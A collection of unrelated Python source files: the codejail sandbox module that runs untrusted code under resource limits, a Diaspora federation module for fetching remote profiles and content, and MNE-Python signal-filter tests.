print "Images generated successfully."
|
|
"""Run code in a jail."""
import logging
import os
import os.path
import resource
import shutil
import sys
from .proxy import run_subprocess_through_proxy
from .subproc import run_subprocess
from .util import temp_directory
log = logging.getLogger("codejail")
# TODO: limit too much stdout data? # pylint: disable=fixme
# Configure the commands
# COMMANDS is a map from an abstract command name to a list of command-line
# pieces, such as subprocess.Popen wants.
COMMANDS = {}
def configure(command, bin_path, user=None):
"""
Configure a command for `jail_code` to use.
`command` is the abstract command you're configuring, such as "python" or
"node". `bin_path` is the path to the binary. `user`, if provided, is
the user name to run the command under.
"""
cmd_argv = [bin_path]
# Command-specific arguments
if command == "python":
# -E means ignore the environment variables PYTHON*
# -B means don't try to write .pyc files.
cmd_argv.extend(['-E', '-B'])
COMMANDS[command] = {
# The start of the command line for this program.
'cmdline_start': cmd_argv,
# The user to run this as, perhaps None.
'user': user,
}
def is_configured(command):
"""
Has `jail_code` been configured for `command`?
Returns true if the abstract command `command` has been configured for use
in the `jail_code` function.
"""
return command in COMMANDS
# By default, look where our current Python is, and maybe there's a
# python-sandbox alongside. Only do this if running in a virtualenv.
# The check for sys.real_prefix covers virtualenv
# the equality of non-empty sys.base_prefix with sys.prefix covers venv
running_in_virtualenv = (
hasattr(sys, 'real_prefix') or
(hasattr(sys, 'base_prefix') and sys.base_prefix != sys.prefix)
)
if running_in_virtualenv:
# On jenkins
sandbox_user = os.getenv('CODEJAIL_TEST_USER')
sandbox_env = os.getenv('CODEJAIL_TEST_VENV')
if sandbox_env and sandbox_user:
configure("python", f"{sandbox_env}/bin/python", sandbox_user)
# or fall back to defaults
elif os.path.isdir(sys.prefix + "-sandbox"):
configure("python", sys.prefix + "-sandbox/bin/python", "sandbox")
# The resource limits that we unless otherwise configured.
DEFAULT_LIMITS = {
# CPU seconds, defaulting to 1.
"CPU": 1,
# Real time, defaulting to 1 second.
"REALTIME": 1,
# Total process virutal memory, in bytes, defaulting to unlimited.
"VMEM": 0,
# Size of files creatable, in bytes, defaulting to nothing can be written.
"FSIZE": 0,
# The number of processes and threads to allow.
"NPROC": 15,
# Whether to use a proxy process or not. None means use an environment
# variable to decide. NOTE: using a proxy process is NOT THREAD-SAFE, only
# one thread can use CodeJail at a time if you are using a proxy process.
"PROXY": None,
}
# Configured resource limits.
# Modified by calling `set_limit`.
LIMITS = DEFAULT_LIMITS.copy()
# Map from limit_overrides_contexts (strings) to dictionaries in the shape of LIMITS.
# Modified by calling `override_limit`.
LIMIT_OVERRIDES = {}
def set_limit(limit_name, value):
"""
Set a limit for `jail_code`.
`limit_name` is a string, the name of the limit to set. `value` is the
value to use for that limit. The type, meaning, default, and range of
accepted values depend on `limit_name`.
These limits are available:
* `"CPU"`: the maximum number of CPU seconds the jailed code can use.
The value is an integer, defaulting to 1.
* `"REALTIME"`: the maximum number of seconds the jailed code can run,
in real time. The default is 1 second.
* `"VMEM"`: the total virtual memory available to the jailed code, in
bytes. The default is 0 (no memory limit).
* `"FSIZE"`: the maximum size of files creatable by the jailed code,
in bytes. The default is 0 (no files may be created).
* `"NPROC"`: the maximum number of process or threads creatable by the
jailed code. The default is 15.
* `"PROXY"`: 1 to use a proxy process, 0 to not use one. This isn't
really a limit, sorry about that.
Limits are process-wide, and will affect all future calls to jail_code.
Providing a limit of 0 will disable that limit.
"""
LIMITS[limit_name] = value
def get_effective_limits(overrides_context=None):
"""
Calculate the effective limits dictionary.
Arguments:
overrides_context (str|None): Identifies which set of overrides to use.
If None or missing from `LIMIT_OVERRIDES`, then just return `LIMITS` as-is.
"""
overrides = LIMIT_OVERRIDES.get(overrides_context, {}) if overrides_context else {}
return {**LIMITS, **overrides}
def override_limit(limit_name, value, limit_overrides_context):
"""
Override a limit for `jail_code`, but only in the context of `limit_overrides_context`.
See `set_limit` for the meaning of `limit_name` and `value`.
All limits may be overriden except PROXY. Having this setting be different between
executions of code is not supported. If one attempts to override PROXY, the override
will be ignored and the globally-configured value will be used instead.
"""
if limit_name == 'PROXY' and LIMITS['PROXY'] != value:
log.error(
'Tried to override value of PROXY to %s. '
'Overriding PROXY on a per-context basis is not permitted. '
'Will use globally-configured value instead: %s.',
value,
LIMITS['PROXY'],
)
return
if limit_overrides_context not in LIMIT_OVERRIDES:
LIMIT_OVERRIDES[limit_overrides_context] = {}
LIMIT_OVERRIDES[limit_overrides_context][limit_name] = value
class JailResult:
"""
A passive object for us to return from jail_code.
"""
def __init__(self):
self.stdout = self.stderr = self.status = None
def jail_code(command, code=None, files=None, extra_files=None, argv=None,
stdin=None, limit_overrides_context=None, slug=None):
"""
Run code in a jailed subprocess.
`command` is an abstract command ("python", "node", ...) that must have
been configured using `configure`.
`code` is a string containing the code to run. If no code is supplied,
then the code to run must be in one of the `files` copied, and must be
named in the `argv` list.
`files` is a list of file paths, they are all copied to the jailed
directory. Note that no check is made here that the files don't contain
sensitive information. The caller must somehow determine whether to allow
the code access to the files. Symlinks will be copied as symlinks. If the
linked-to file is not accessible to the sandbox, the symlink will be
unreadable as well.
`extra_files` is a list of pairs, each pair is a filename and a bytestring
of contents to write into that file. These files will be created in the
temp directory and cleaned up automatically. No subdirectories are
supported in the filename.
`argv` is the command-line arguments to supply.
`stdin` is a string, the data to provide as the stdin for the process.
`limit_overrides_context` is an optional string to use as a key against the
configured limit overrides contexts. If omitted or if no such limit override context
has been configured, then use the default limits.
`slug` is an arbitrary string, a description that's meaningful to the
caller, that will be used in log messages.
Return an object with:
.stdout: stdout of the program, a string
.stderr: stderr of the program, a string
.status: exit status of the process: an int, 0 for success
"""
# pylint: disable=too-many-statements
if not is_configured(command):
raise Exception("jail_code needs to be configured for %r" % command)
# We make a temp directory to serve as the home of the sandboxed code.
# It has a writable "tmp" directory within it for temp files.
with temp_directory() as homedir:
# Make directory readable by other users ('sandbox' user needs to be
# able to read it).
os.chmod(homedir, 0o775)
# Make a subdir to use for temp files, world-writable so that the
# sandbox user can write to it.
tmptmp = os.path.join(homedir, "tmp")
os.mkdir(tmptmp)
os.chmod(tmptmp, 0o777)
argv = argv or []
# All the supporting files are copied into our directory.
for filename in files or ():
dest = os.path.join(homedir, os.path.basename(filename))
if os.path.islink(filename):
os.symlink(os.readlink(filename), dest)
elif os.path.isfile(filename):
shutil.copy(filename, homedir)
else:
shutil.copytree(filename, dest, symlinks=True)
# Create the main file.
if code:
with open(os.path.join(homedir, "jailed_code"), "wb") as jailed:
code_bytes = bytes(code, 'utf8')
jailed.write(code_bytes)
argv = ["jailed_code"] + argv
# Create extra files requested by the caller:
for name, content in extra_files or ():
with open(os.path.join(homedir, name), "wb") as extra:
extra.write(content)
cmd = []
rm_cmd = []
# Build the command to run.
user = COMMANDS[command]['user']
if user:
# Run as the specified user
cmd.extend(['sudo', '-u', user])
rm_cmd.extend(['sudo', '-u', user])
# Point TMPDIR at our temp directory.
cmd.extend(['TMPDIR=tmp'])
# Start with the command line dictated by "python" or whatever.
cmd.extend(COMMANDS[command]['cmdline_start'])
# Add the code-specific command line pieces.
cmd.extend(argv)
# Determine effective resource limits.
effective_limits = get_effective_limits(limit_overrides_context)
if slug:
log.info(
"Preparing to execute jailed code %r "
"(overrides context = %r, resource limits = %r).",
slug,
limit_overrides_context,
effective_limits,
)
# Use the configuration and maybe an environment variable to determine
# whether to use a proxy process.
use_proxy = effective_limits["PROXY"]
if use_proxy is None:
use_proxy = int(os.environ.get("CODEJAIL_PROXY", "0"))
if use_proxy:
run_subprocess_fn = run_subprocess_through_proxy
else:
run_subprocess_fn = run_subprocess
if stdin:
stdin = bytes(stdin, 'utf-8')
# Run the subprocess.
status, stdout, stderr = run_subprocess_fn(
cmd=cmd, cwd=homedir, env={}, slug=slug,
stdin=stdin,
realtime=effective_limits["REALTIME"],
rlimits=create_rlimits(effective_limits),
)
result = JailResult()
result.status = status
result.stdout = stdout
result.stderr = stderr
# Remove the tmptmp directory as the sandbox user since the sandbox
# user may have written files that the application user can't delete.
rm_cmd.extend([
'/usr/bin/find', tmptmp,
'-mindepth', '1', '-maxdepth', '1',
'-exec', 'rm', '-rf', '{}', ';'
])
# Run the rm command subprocess.
run_subprocess_fn(rm_cmd, cwd=homedir)
return result
def create_rlimits(effective_limits):
"""
Create a list of resource limits for our jailed processes.
Arguments:
effective_limits (dict)
"""
rlimits = []
# Allow a small number of subprocess and threads. One limit controls both,
# and at least OpenBLAS (imported by numpy) requires threads.
nproc = effective_limits["NPROC"]
if nproc:
rlimits.append((resource.RLIMIT_NPROC, (nproc, nproc)))
# CPU seconds, not wall clock time.
cpu = effective_limits["CPU"]
if cpu:
# Set the soft limit and the hard limit differently. When the process
# reaches the soft limit, a SIGXCPU will be sent, which should kill the
# process. If you set the soft and hard limits the same, then the hard
# limit is reached, and a SIGKILL is sent, which is less distinctive.
rlimits.append((resource.RLIMIT_CPU, (cpu, cpu+1)))
# Total process virtual memory.
vmem = effective_limits["VMEM"]
if vmem:
rlimits.append((resource.RLIMIT_AS, (vmem, vmem)))
# Size of written files. Can be zero (nothing can be written).
fsize = effective_limits["FSIZE"]
rlimits.append((resource.RLIMIT_FSIZE, (fsize, fsize)))
return rlimits
|
|
import json
import logging
import xml
from typing import Callable, Dict
from urllib.parse import quote
from lxml import html
from xrd import XRD
from federation.inbound import handle_receive
from federation.types import RequestType
from federation.utils.network import fetch_document, try_retrieve_webfinger_document
from federation.utils.text import validate_handle
logger = logging.getLogger("federation")
def fetch_public_key(handle):
"""Fetch public key over the network.
:param handle: Remote handle to retrieve public key for.
:return: Public key in str format from parsed profile.
"""
profile = retrieve_and_parse_profile(handle)
return profile.public_key
def parse_diaspora_webfinger(document: str) -> Dict:
"""
Parse Diaspora webfinger which is either in JSON format (new) or XRD (old).
https://diaspora.github.io/diaspora_federation/discovery/webfinger.html
"""
webfinger = {
"hcard_url": None,
}
# noinspection PyBroadException
try:
doc = json.loads(document)
for link in doc["links"]:
if link["rel"] == "http://microformats.org/profile/hcard":
webfinger["hcard_url"] = link["href"]
break
else:
logger.warning("parse_diaspora_webfinger: found JSON webfinger but it has no hcard href")
raise ValueError
except Exception:
try:
xrd = XRD.parse_xrd(document)
webfinger["hcard_url"] = xrd.find_link(rels="http://microformats.org/profile/hcard").href
except (xml.parsers.expat.ExpatError, TypeError):
logger.warning("parse_diaspora_webfinger: found XML webfinger but it fails to parse")
pass
return webfinger
def retrieve_diaspora_hcard(handle):
"""
Retrieve a remote Diaspora hCard document.
:arg handle: Remote handle to retrieve
:return: str (HTML document)
"""
webfinger = retrieve_and_parse_diaspora_webfinger(handle)
document, code, exception = fetch_document(webfinger.get("hcard_url"))
if exception:
return None
return document
def retrieve_and_parse_diaspora_webfinger(handle):
"""
Retrieve a and parse a remote Diaspora webfinger document.
:arg handle: Remote handle to retrieve
:returns: dict
"""
document = try_retrieve_webfinger_document(handle)
if document:
return parse_diaspora_webfinger(document)
host = handle.split("@")[1]
hostmeta = retrieve_diaspora_host_meta(host)
if not hostmeta:
return None
url = hostmeta.find_link(rels="lrdd").template.replace("{uri}", quote(handle))
document, code, exception = fetch_document(url)
if exception:
return None
return parse_diaspora_webfinger(document)
def retrieve_diaspora_host_meta(host):
"""
Retrieve a remote Diaspora host-meta document.
:arg host: Host to retrieve from
:returns: ``XRD`` instance
"""
document, code, exception = fetch_document(host=host, path="/.well-known/host-meta")
if exception:
return None
xrd = XRD.parse_xrd(document)
return xrd
def _get_element_text_or_none(document, selector):
"""
Using a CSS selector, get the element and return the text, or None if no element.
:arg document: ``HTMLElement`` document
:arg selector: CSS selector
:returns: str or None
"""
element = document.cssselect(selector)
if element:
return element[0].text
return None
def _get_element_attr_or_none(document, selector, attribute):
"""
Using a CSS selector, get the element and return the given attribute value, or None if no element.
Args:
document (HTMLElement) - HTMLElement document
selector (str) - CSS selector
attribute (str) - The attribute to get from the element
"""
element = document.cssselect(selector)
if element:
return element[0].get(attribute)
return None
def parse_profile_from_hcard(hcard: str, handle: str):
"""
Parse all the fields we can from a hCard document to get a Profile.
:arg hcard: HTML hcard document (str)
:arg handle: User handle in username@domain.tld format
:returns: ``federation.entities.diaspora.entities.DiasporaProfile`` instance
"""
from federation.entities.diaspora.entities import DiasporaProfile # Circulars
doc = html.fromstring(hcard)
profile = DiasporaProfile(
name=_get_element_text_or_none(doc, ".fn"),
image_urls={
"small": _get_element_attr_or_none(doc, ".entity_photo_small .photo", "src"),
"medium": _get_element_attr_or_none(doc, ".entity_photo_medium .photo", "src"),
"large": _get_element_attr_or_none(doc, ".entity_photo .photo", "src"),
},
public=True,
id=handle,
handle=handle,
guid=_get_element_text_or_none(doc, ".uid"),
public_key=_get_element_text_or_none(doc, ".key"),
username=handle.split('@')[0],
_source_protocol="diaspora",
)
return profile
def retrieve_and_parse_content(
id: str, guid: str, handle: str, entity_type: str, sender_key_fetcher: Callable[[str], str]=None,
):
"""Retrieve remote content and return an Entity class instance.
This is basically the inverse of receiving an entity. Instead, we fetch it, then call "handle_receive".
:param sender_key_fetcher: Function to use to fetch sender public key. If not given, network will be used
to fetch the profile and the key. Function must take handle as only parameter and return a public key.
:returns: Entity object instance or ``None``
"""
if not validate_handle(handle):
return
_username, domain = handle.split("@")
url = get_fetch_content_endpoint(domain, entity_type.lower(), guid)
document, status_code, error = fetch_document(url)
if status_code == 200:
request = RequestType(body=document)
_sender, _protocol, entities = handle_receive(request, sender_key_fetcher=sender_key_fetcher)
if len(entities) > 1:
logger.warning("retrieve_and_parse_content - more than one entity parsed from remote even though we"
"expected only one! ID %s", guid)
if entities:
return entities[0]
return
elif status_code == 404:
logger.warning("retrieve_and_parse_content - remote content %s not found", guid)
return
if error:
raise error
raise Exception("retrieve_and_parse_content - unknown problem when fetching document: %s, %s, %s" % (
document, status_code, error,
))
def retrieve_and_parse_profile(handle):
"""
Retrieve the remote user and return a Profile object.
:arg handle: User handle in username@domain.tld format
:returns: ``federation.entities.Profile`` instance or None
"""
hcard = retrieve_diaspora_hcard(handle)
if not hcard:
return None
profile = parse_profile_from_hcard(hcard, handle)
try:
profile.validate()
except ValueError as ex:
logger.warning("retrieve_and_parse_profile - found profile %s but it didn't validate: %s",
profile, ex)
return None
return profile
def get_fetch_content_endpoint(domain, entity_type, guid):
"""Get remote fetch content endpoint.
See: https://diaspora.github.io/diaspora_federation/federation/fetching.html
"""
return "https://%s/fetch/%s/%s" % (domain, entity_type, guid)
def get_public_endpoint(id: str) -> str:
"""Get remote endpoint for delivering public payloads."""
_username, domain = id.split("@")
return "https://%s/receive/public" % domain
def get_private_endpoint(id: str, guid: str) -> str:
"""Get remote endpoint for delivering private payloads."""
_username, domain = id.split("@")
return "https://%s/receive/users/%s" % (domain, guid)
|
|
import os.path as op
import warnings
import numpy as np
from numpy.testing import (assert_array_almost_equal, assert_almost_equal,
assert_array_equal, assert_allclose)
from nose.tools import assert_equal, assert_true, assert_raises
from scipy.signal import resample as sp_resample, butter
from mne import create_info
from mne.io import RawArray, read_raw_fif
from mne.filter import (band_pass_filter, high_pass_filter, low_pass_filter,
band_stop_filter, resample, _resample_stim_channels,
construct_iir_filter, notch_filter, detrend,
_overlap_add_filter, _smart_pad, design_mne_c_filter,
estimate_ringing_samples, filter_data)
from mne.utils import (sum_squared, run_tests_if_main, slow_test,
catch_logging, requires_version, _TempDir,
requires_mne, run_subprocess)
warnings.simplefilter('always') # enable b/c these tests throw warnings
rng = np.random.RandomState(0)
@requires_mne
def test_mne_c_design():
"""Test MNE-C filter design"""
tempdir = _TempDir()
temp_fname = op.join(tempdir, 'test_raw.fif')
out_fname = op.join(tempdir, 'test_c_raw.fif')
x = np.zeros((1, 10001))
x[0, 5000] = 1.
time_sl = slice(5000 - 4096, 5000 + 4097)
sfreq = 1000.
RawArray(x, create_info(1, sfreq, 'eeg')).save(temp_fname)
tols = dict(rtol=1e-4, atol=1e-4)
cmd = ('mne_process_raw', '--projoff', '--raw', temp_fname,
'--save', out_fname)
run_subprocess(cmd)
h = design_mne_c_filter(sfreq, None, 40)
h_c = read_raw_fif(out_fname)[0][0][0][time_sl]
assert_allclose(h, h_c, **tols)
run_subprocess(cmd + ('--highpass', '5', '--highpassw', '2.5'))
h = design_mne_c_filter(sfreq, 5, 40, 2.5)
h_c = read_raw_fif(out_fname)[0][0][0][time_sl]
assert_allclose(h, h_c, **tols)
run_subprocess(cmd + ('--lowpass', '1000', '--highpass', '10'))
h = design_mne_c_filter(sfreq, 10, None, verbose=True)
h_c = read_raw_fif(out_fname)[0][0][0][time_sl]
assert_allclose(h, h_c, **tols)
@requires_version('scipy', '0.16')
def test_estimate_ringing():
"""Test our ringing estimation function"""
# Actual values might differ based on system, so let's be approximate
for kind in ('ba', 'sos'):
for thresh, lims in ((0.1, (30, 60)), # 47
(0.01, (300, 600)), # 475
(0.001, (3000, 6000)), # 4758
(0.0001, (30000, 60000))): # 37993
n_ring = estimate_ringing_samples(butter(3, thresh, output=kind))
assert_true(lims[0] <= n_ring <= lims[1],
msg='%s %s: %s <= %s <= %s'
% (kind, thresh, lims[0], n_ring, lims[1]))
with warnings.catch_warnings(record=True) as w:
assert_equal(estimate_ringing_samples(butter(4, 0.00001)), 100000)
assert_true(any('properly estimate' in str(ww.message) for ww in w))
def test_1d_filter():
"""Test our private overlap-add filtering function"""
# make some random signals and filters
for n_signal in (1, 2, 3, 5, 10, 20, 40):
x = rng.randn(n_signal)
for n_filter in (1, 2, 3, 5, 10, 11, 20, 21, 40, 41, 100, 101):
for filter_type in ('identity', 'random'):
if filter_type == 'random':
h = rng.randn(n_filter)
else: # filter_type == 'identity'
h = np.concatenate([[1.], np.zeros(n_filter - 1)])
# ensure we pad the signal the same way for both filters
n_pad = n_filter - 1
x_pad = _smart_pad(x, np.array([n_pad, n_pad]))
for phase in ('zero', 'linear', 'zero-double'):
# compute our expected result the slow way
if phase == 'zero':
# only allow zero-phase for odd-length filters
if n_filter % 2 == 0:
assert_raises(RuntimeError, _overlap_add_filter,
x[np.newaxis], h, phase=phase)
continue
shift = (len(h) - 1) // 2
x_expected = np.convolve(x_pad, h)
x_expected = x_expected[shift:len(x_expected) - shift]
elif phase == 'zero-double':
shift = len(h) - 1
x_expected = np.convolve(x_pad, h)
x_expected = np.convolve(x_expected[::-1], h)[::-1]
x_expected = x_expected[shift:len(x_expected) - shift]
shift = 0
else:
shift = 0
x_expected = np.convolve(x_pad, h)
x_expected = x_expected[:len(x_expected) - len(h) + 1]
# remove padding
if n_pad > 0:
x_expected = x_expected[n_pad:len(x_expected) - n_pad]
assert_equal(len(x_expected), len(x))
# make sure we actually set things up reasonably
if filter_type == 'identity':
out = x_pad.copy()
out = out[shift + n_pad:]
out = out[:len(x)]
out = np.concatenate((out, np.zeros(max(len(x) -
len(out), 0))))
assert_equal(len(out), len(x))
assert_allclose(out, x_expected)
assert_equal(len(x_expected), len(x))
# compute our version
for n_fft in (None, 32, 128, 129, 1023, 1024, 1025, 2048):
# need to use .copy() b/c signal gets modified inplace
x_copy = x[np.newaxis, :].copy()
min_fft = 2 * n_filter - 1
if phase == 'zero-double':
min_fft = 2 * min_fft - 1
if n_fft is not None and n_fft < min_fft:
assert_raises(ValueError, _overlap_add_filter,
x_copy, h, n_fft, phase=phase)
else:
x_filtered = _overlap_add_filter(
x_copy, h, n_fft, phase=phase)[0]
assert_allclose(x_filtered, x_expected, atol=1e-13)
@requires_version('scipy', '0.16')
def test_iir_stability():
"""Test IIR filter stability check"""
sig = np.empty(1000)
sfreq = 1000
# This will make an unstable filter, should throw RuntimeError
assert_raises(RuntimeError, high_pass_filter, sig, sfreq, 0.6,
method='iir', iir_params=dict(ftype='butter', order=8,
output='ba'))
# This one should work just fine
high_pass_filter(sig, sfreq, 0.6, method='iir',
iir_params=dict(ftype='butter', order=8, output='sos'))
# bad system type
assert_raises(ValueError, high_pass_filter, sig, sfreq, 0.6, method='iir',
iir_params=dict(ftype='butter', order=8, output='foo'))
# missing ftype
assert_raises(RuntimeError, high_pass_filter, sig, sfreq, 0.6,
method='iir', iir_params=dict(order=8, output='sos'))
# bad ftype
assert_raises(RuntimeError, high_pass_filter, sig, sfreq, 0.6,
method='iir',
iir_params=dict(order=8, ftype='foo', output='sos'))
# missing gstop
assert_raises(RuntimeError, high_pass_filter, sig, sfreq, 0.6,
method='iir', iir_params=dict(gpass=0.5, output='sos'))
# can't pass iir_params if method='fft'
assert_raises(ValueError, high_pass_filter, sig, sfreq, 0.1,
method='fft', iir_params=dict(ftype='butter', order=2,
output='sos'))
# method must be string
assert_raises(TypeError, high_pass_filter, sig, sfreq, 0.1,
method=1)
# unknown method
assert_raises(ValueError, high_pass_filter, sig, sfreq, 0.1,
method='blah')
# bad iir_params
assert_raises(TypeError, high_pass_filter, sig, sfreq, 0.1,
method='iir', iir_params='blah')
assert_raises(ValueError, high_pass_filter, sig, sfreq, 0.1,
method='fft', iir_params=dict())
# should pass because dafault trans_bandwidth is not relevant
iir_params = dict(ftype='butter', order=2, output='sos')
x_sos = high_pass_filter(sig, 250, 0.5, method='iir',
iir_params=iir_params)
iir_params_sos = construct_iir_filter(iir_params, f_pass=0.5, sfreq=250,
btype='highpass')
x_sos_2 = high_pass_filter(sig, 250, 0.5, method='iir',
iir_params=iir_params_sos)
assert_allclose(x_sos[100:-100], x_sos_2[100:-100])
x_ba = high_pass_filter(sig, 250, 0.5, method='iir',
iir_params=dict(ftype='butter', order=2,
output='ba'))
# Note that this will fail for higher orders (e.g., 6) showing the
# hopefully decreased numerical error of SOS
assert_allclose(x_sos[100:-100], x_ba[100:-100])
def test_notch_filters():
"""Test notch filters"""
# let's use an ugly, prime sfreq for fun
sfreq = 487.0
sig_len_secs = 20
t = np.arange(0, int(sig_len_secs * sfreq)) / sfreq
freqs = np.arange(60, 241, 60)
# make a "signal"
a = rng.randn(int(sig_len_secs * sfreq))
orig_power = np.sqrt(np.mean(a ** 2))
# make line noise
a += np.sum([np.sin(2 * np.pi * f * t) for f in freqs], axis=0)
# only allow None line_freqs with 'spectrum_fit' mode
assert_raises(ValueError, notch_filter, a, sfreq, None, 'fft')
assert_raises(ValueError, notch_filter, a, sfreq, None, 'iir')
methods = ['spectrum_fit', 'spectrum_fit', 'fft', 'fft', 'iir']
filter_lengths = [None, None, None, 8192, None]
line_freqs = [None, freqs, freqs, freqs, freqs]
tols = [2, 1, 1, 1]
for meth, lf, fl, tol in zip(methods, line_freqs, filter_lengths, tols):
with catch_logging() as log_file:
with warnings.catch_warnings(record=True): # filter_length=None
b = notch_filter(a, sfreq, lf, filter_length=fl, method=meth,
phase='zero', verbose=True)
if lf is None:
out = log_file.getvalue().split('\n')[:-1]
if len(out) != 2 and len(out) != 3: # force_serial: len(out) == 3
raise ValueError('Detected frequencies not logged properly')
out = np.fromstring(out[-1], sep=', ')
assert_array_almost_equal(out, freqs)
new_power = np.sqrt(sum_squared(b) / b.size)
assert_almost_equal(new_power, orig_power, tol)
def test_resample():
"""Test resampling"""
x = rng.normal(0, 1, (10, 10, 10))
x_rs = resample(x, 1, 2, 10)
assert_equal(x.shape, (10, 10, 10))
assert_equal(x_rs.shape, (10, 10, 5))
x_2 = x.swapaxes(0, 1)
x_2_rs = resample(x_2, 1, 2, 10)
assert_array_equal(x_2_rs.swapaxes(0, 1), x_rs)
x_3 = x.swapaxes(0, 2)
x_3_rs = resample(x_3, 1, 2, 10, 0)
assert_array_equal(x_3_rs.swapaxes(0, 2), x_rs)
# make sure we cast to array if necessary
assert_array_equal(resample([0, 0], 2, 1), [0., 0., 0., 0.])
def test_resample_stim_channel():
"""Test resampling of stim channels"""
# Downsampling
assert_array_equal(
_resample_stim_channels([1, 0, 0, 0, 2, 0, 0, 0], 1, 2),
[[1, 0, 2, 0]])
assert_array_equal(
_resample_stim_channels([1, 0, 0, 0, 2, 0, 0, 0], 1, 1.5),
[[1, 0, 0, 2, 0]])
assert_array_equal(
_resample_stim_channels([1, 0, 0, 1, 2, 0, 0, 1], 1, 2),
[[1, 1, 2, 1]])
# Upsampling
assert_array_equal(
_resample_stim_channels([1, 2, 3], 2, 1), [[1, 1, 2, 2, 3, 3]])
assert_array_equal(
_resample_stim_channels([1, 2, 3], 2.5, 1), [[1, 1, 1, 2, 2, 3, 3, 3]])
# Proper number of samples in stim channel resampling from io/base.py
data_chunk = np.zeros((1, 315600))
for new_data_len in (52598, 52599, 52600, 52601, 315599, 315600):
new_data = _resample_stim_channels(data_chunk, new_data_len,
data_chunk.shape[1])
assert_equal(new_data.shape[1], new_data_len)
@requires_version('scipy', '0.16')
@slow_test
def test_filters():
"""Test low-, band-, high-pass, and band-stop filters plus resampling"""
sfreq = 100
sig_len_secs = 15
a = rng.randn(2, sig_len_secs * sfreq)
# let's test our catchers
for fl in ['blah', [0, 1], 1000.5, '10ss', '10']:
assert_raises(ValueError, band_pass_filter, a, sfreq, 4, 8, fl,
1.0, 1.0, phase='zero')
for nj in ['blah', 0.5]:
assert_raises(ValueError, band_pass_filter, a, sfreq, 4, 8, 100,
1.0, 1.0, n_jobs=nj, phase='zero', fir_window='hann')
assert_raises(ValueError, band_pass_filter, a, sfreq, 4, 8, 100,
1.0, 1.0, phase='zero', fir_window='foo')
# > Nyq/2
assert_raises(ValueError, band_pass_filter, a, sfreq, 4, sfreq / 2.,
100, 1.0, 1.0, phase='zero', fir_window='hann')
assert_raises(ValueError, low_pass_filter, a, sfreq, sfreq / 2.,
100, 1.0, phase='zero', fir_window='hann')
# check our short-filter warning:
with warnings.catch_warnings(record=True) as w:
# Warning for low attenuation
band_pass_filter(a, sfreq, 1, 8, filter_length=256, phase='zero')
assert_true(any('attenuation' in str(ww.message) for ww in w))
with warnings.catch_warnings(record=True) as w:
# Warning for too short a filter
band_pass_filter(a, sfreq, 1, 8, filter_length='0.5s', phase='zero')
assert_true(any('Increase filter_length' in str(ww.message) for ww in w))
# try new default and old default
for fl in ['auto', '10s', '5000ms', 1024]:
bp = band_pass_filter(a, sfreq, 4, 8, fl, 1.0, 1.0, phase='zero',
fir_window='hamming')
bs = band_stop_filter(a, sfreq, 4 - 1.0, 8 + 1.0, fl, 1.0, 1.0,
phase='zero', fir_window='hamming')
lp = low_pass_filter(a, sfreq, 8, fl, 1.0, n_jobs=2, phase='zero',
fir_window='hamming')
hp = high_pass_filter(lp, sfreq, 4, fl, 1.0, phase='zero',
fir_window='hamming')
assert_array_almost_equal(hp, bp, 4)
assert_array_almost_equal(bp + bs, a, 4)
# and since these are low-passed, downsampling/upsampling should be close
n_resamp_ignore = 10
bp_up_dn = resample(resample(bp, 2, 1, n_jobs=2), 1, 2, n_jobs=2)
assert_array_almost_equal(bp[n_resamp_ignore:-n_resamp_ignore],
bp_up_dn[n_resamp_ignore:-n_resamp_ignore], 2)
# note that on systems without CUDA, this line serves as a test for a
# graceful fallback to n_jobs=1
bp_up_dn = resample(resample(bp, 2, 1, n_jobs='cuda'), 1, 2, n_jobs='cuda')
assert_array_almost_equal(bp[n_resamp_ignore:-n_resamp_ignore],
bp_up_dn[n_resamp_ignore:-n_resamp_ignore], 2)
# test to make sure our resamling matches scipy's
bp_up_dn = sp_resample(sp_resample(bp, 2 * bp.shape[-1], axis=-1,
window='boxcar'),
bp.shape[-1], window='boxcar', axis=-1)
assert_array_almost_equal(bp[n_resamp_ignore:-n_resamp_ignore],
bp_up_dn[n_resamp_ignore:-n_resamp_ignore], 2)
# make sure we don't alias
t = np.array(list(range(sfreq * sig_len_secs))) / float(sfreq)
# make sinusoid close to the Nyquist frequency
sig = np.sin(2 * np.pi * sfreq / 2.2 * t)
# signal should disappear with 2x downsampling
sig_gone = resample(sig, 1, 2)[n_resamp_ignore:-n_resamp_ignore]
assert_array_almost_equal(np.zeros_like(sig_gone), sig_gone, 2)
# let's construct some filters
iir_params = dict(ftype='cheby1', gpass=1, gstop=20, output='ba')
iir_params = construct_iir_filter(iir_params, 40, 80, 1000, 'low')
# this should be a third order filter
assert_equal(iir_params['a'].size - 1, 3)
assert_equal(iir_params['b'].size - 1, 3)
iir_params = dict(ftype='butter', order=4, output='ba')
iir_params = construct_iir_filter(iir_params, 40, None, 1000, 'low')
assert_equal(iir_params['a'].size - 1, 4)
assert_equal(iir_params['b'].size - 1, 4)
iir_params = dict(ftype='cheby1', gpass=1, gstop=20, output='sos')
iir_params = construct_iir_filter(iir_params, 40, 80, 1000, 'low')
# this should be a third order filter, which requires 2 SOS ((2, 6))
assert_equal(iir_params['sos'].shape, (2, 6))
iir_params = dict(ftype='butter', order=4, output='sos')
iir_params = construct_iir_filter(iir_params, 40, None, 1000, 'low')
assert_equal(iir_params['sos'].shape, (2, 6))
# check that picks work for 3d array with one channel and picks=[0]
a = rng.randn(5 * sfreq, 5 * sfreq)
b = a[:, None, :]
a_filt = band_pass_filter(a, sfreq, 4, 8, 400, 2.0, 2.0, phase='zero',
fir_window='hamming')
b_filt = band_pass_filter(b, sfreq, 4, 8, 400, 2.0, 2.0, picks=[0],
phase='zero', fir_window='hamming')
assert_array_equal(a_filt[:, None, :], b_filt)
# check for n-dimensional case
a = rng.randn(2, 2, 2, 2)
with warnings.catch_warnings(record=True): # filter too long
assert_raises(ValueError, band_pass_filter, a, sfreq, 4, 8, 100,
1.0, 1.0, picks=np.array([0, 1]), phase='zero')
def test_filter_auto():
"""Test filter auto parameters"""
# test that our overlap-add filtering doesn't introduce strange
# artifacts (from mne_analyze mailing list 2015/06/25)
N = 300
sfreq = 100.
lp = 10.
sine_freq = 1.
x = np.ones(N)
t = np.arange(N) / sfreq
x += np.sin(2 * np.pi * sine_freq * t)
x_filt = low_pass_filter(x, sfreq, lp, 'auto', 'auto', phase='zero',
fir_window='hamming')
# the firwin2 function gets us this close
assert_allclose(x, x_filt, rtol=1e-4, atol=1e-4)
# degenerate conditions
assert_raises(ValueError, filter_data, x, sfreq, 1, 10) # not 2D
